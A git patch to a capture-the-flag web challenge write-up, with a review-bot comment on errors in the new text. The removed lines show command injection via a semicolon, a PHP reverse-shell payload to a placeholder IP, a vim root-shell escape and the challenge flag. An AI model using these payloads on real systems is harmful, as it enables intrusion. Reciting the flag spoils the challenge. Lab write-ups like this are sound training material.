From ac86a16cc4a044feb41ea7fd3253c7c836fa29e9 Mon Sep 17 00:00:00 2001 From: Twi <31920608+gzavz@users.noreply.github.com> Date: Thu, 18 Apr 2024 21:27:19 +0800 Subject: [PATCH] Update writeup.md --- challenges/web/Status Checker/writeup.md | 36 ++++-------------------- 1 file changed, 5 insertions(+), 31 deletions(-) diff --git a/challenges/web/Status Checker/writeup.md b/challenges/web/Status Checker/writeup.md index 0b42da6..ba15b92 100644 --- a/challenges/web/Status Checker/writeup.md +++ b/challenges/web/Status Checker/writeup.md 
@@ -8,38 +8,12 @@ Entering a semi-colon (;) will break the command. We can try to use the payload ![wimg-2](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-2.png) -We can attempt to spawn a reverse shell by first having netcat listen on our desired port. In this example, the port will be 45101 and the netcat command will be ``nc -nlvp 45101`` as seen in the following screenshot. +We can attempt to use the command ``sudo -l``. We can see that we are able to run any command as sudo without a password as seen in the followings screenshot. -![wimg-3](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-3.png) +![wimg-3]() -Once its listening on the port, we can use the following payload to spawn the reverse shell. Replace "YOUR-IP-HERE" with your IP address. +We can attempt to use the command ``sudo ls /root/`` to list the root directory. We can see that there is a file called ``flag.txt`` as seen in the following screenshot. -``` -; php -r '$sock=fsockopen("YOUR-IP-ADDRESS",45101);exec("/bin/sh -i <&3 >&3 2>&3");' -``` +![wimg-4]() -Input the above payload into the input box as seen in the following screenshot. - -![wimg-4](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-4.png) - -Click on the "Check HTTP Status" and observe that the website has hung. Return to the netcat session and observe that we have gotten a shell as seen in the following screenshot. - -![wimg-5](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-5.png) - -We can spawn an interactive shell using the command ``script -qc /bin/bash /dev/null``. Once done, we can explore the system. 
We can use the command ``sudo -l`` and see that we can run the command ``vim`` as root without a password as seen in the following screenshot. - -![wimg-6](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/64886584ff8936fb97898bbd2e3c574d9482bacc/challenges/web/Status%20Checker/images/wimg-6.png) - -Using GTFOBins, we are able to breakout and obtain a shell as a root user using the following command: - -``` -vim -c ':!/bin/sh' -``` - -Using the command ``whoami`` we can see that we are now the root user as seen in the following screenshot. - -![wimg-7](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/64886584ff8936fb97898bbd2e3c574d9482bacc/challenges/web/Status%20Checker/images/wimg-7.png) - -We can obtain the flag in the root directory by using the command ``cd /root`` and ``cat flag.txt``. - -The flag is ``HEX{N3tw0rK_ErR_500_W1kS2kKiL}``. +We can read the contents of the file by using the command ``cat /roo/flag.txt``. The flag is: ````
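Review bot: In the last added line, `cat /roo/flag.txt` misspells the path and drops the `sudo` that the preceding `sudo ls /root/` step used to reach that directory, so the command as written does not match the steps before it; it should read `sudo cat /root/flag.txt`. The two added image links, `![wimg-3]()` and `![wimg-4]()`, have empty targets, so the screenshots the text refers to ("as seen in the following screenshot") will not render; link the new images or drop the references. The closing "The flag is:" is followed by four backticks with nothing between them, where the removed line carried the flag value; if leaving the flag out is intentional, end the sentence without the empty code span. "followings screenshot" should be "following screenshot". The subject "Update writeup.md" also does not say why the reverse-shell and vim steps were replaced with direct sudo commands, which is worth one line in the commit message.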